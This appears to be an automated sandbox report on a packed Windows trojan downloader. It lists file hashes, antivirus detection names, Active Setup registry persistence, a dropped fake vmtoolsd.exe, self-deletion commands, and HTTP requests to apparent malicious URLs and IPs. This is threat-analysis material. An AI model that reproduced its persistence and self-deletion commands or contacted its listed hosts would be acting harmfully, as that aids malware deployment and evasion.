Analysis Date: 2014-07-03 09:00:45
MD5: 1778487352325b2b2351a9b6f6849111
SHA1: e194694b3dcdb9d71120789ce02be11301e68209

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section ad!@.f  md5: 4a09e67490a33572d3793dc6ac928079  sha1: 20d8589f9a0aceb25083b9d6e5a31ee7c8f60368  size: 512
Section ad!@.f  md5: df4c9af0e39c368587c70b8e532e33e3  sha1: 75115ebc2fbed75185de6f77376e58a3c5a170fa  size: 24557
Section ad!@.f  md5: c950579aafcf78fa7421b6501aaa969e  sha1: 8f7f64c8654c89b659dc3beb38f610f4082ec3a5  size: 9728
Section ad!@.f  md5: 84f1ebe52a2f7be1226964bd32c5f727  sha1: 9ea6d753710c9fc808afb2842160c94f571a6de6  size: 512
Timestamp: 2012-07-11 14:56:21
Packer: UPX v0.80 - v0.84
PEhash: 4f61dbd0c4b25e2da42afb19d93448c06dbbeb4b
IMPhash: 469b1bae2575baede5bf1f06a01b4767
AV 360 Safe: Trojan.Generic.KDV.674225
AV Ad-Aware: Trojan.Generic.KDV.674225
AV Alwil (avast): Rootkit-gen [Rtk]
AV Arcabit (arcavir): Packed.Klone.bu
AV Authentium: no_virus
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Klone.r4
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader11.14380
AV Emsisoft: Trojan.Generic.KDV.674225
AV Eset (nod32): Win32/Alyak.E
AV Fortinet: W32/FraudPackTM.A!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.Generic.KDV.674225
AV Grisoft (avg): Generic32.UQT
AV Ikarus: Packed.Win32.Klone
AV K7: Trojan ( 00067a4b1 )
AV Kaspersky: Packed.Win32.Klone.bu
AV MalwareBytes: no_virus
AV Mcafee: ObfuscatedAJJ!hb!177848735232
AV Microsoft Security Essentials: TrojanDownloader:Win32/Kanav.C
AV MicroWorld (escan): Trojan.Generic.KDV.674225
AV Norman: win32:win32/SB/Obfuscated_FA
AV Rising: Trojan.Win32.Vmtoolsd.a
AV Sophos: Mal/EncPk-ACW
AV Symantec: no_virus
AV Trend Micro: TROJ_SPNR.35EF13
AV VirusBlokAda (vba32): TScope.Malware-Cryptor.SB

Runtime Details:

Process
↳ C:\malware.exe

Registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{C6D90BAE-B89C-5BAC-0AC5-F01E87664EE3}\stubpath ➝ %SystemRoot%\system32\vmtoolsd.exe
Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File C:\WINDOWS\system32\vmtoolsd.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process C:\WINDOWS\system32\cmd.exe /c del C:\E19469~1.EXE > nul
Creates Process reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{C6D90BAE-B89C-5BAC-0AC5-F01E87664EE3}" /f
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS googleads
Winsock URL http://www.issuejeju.com/poll/update.txt
Winsock URL http://blog.yahoo.com/naverblog/articles/601941/commentRss

Process
↳ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{C6D90BAE-B89C-5BAC-0AC5-F01E87664EE3}" /f

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\E19469~1.EXE > nul

Creates File nul
Deletes File C:\malware.exe

Network Details:

DNS www.issuejeju.com (Type: A) ➝ 121.78.127.76
DNS any-rc.a01.yahoodns.net (Type: A) ➝ 74.6.50.150
DNS any-rc.a01.yahoodns.net (Type: A) ➝ 98.139.102.145
DNS blog.yahoo.com (Type: A)
HTTP GET http://www.issuejeju.com/poll/update.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
HTTP GET http://blog.yahoo.com/naverblog/articles/601941/commentRss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Flows TCP 192.168.1.1:1031 ➝ 121.78.127.76:80
Flows TCP 192.168.1.1:1032 ➝ 74.6.50.150:80

Raw Pcap

Strings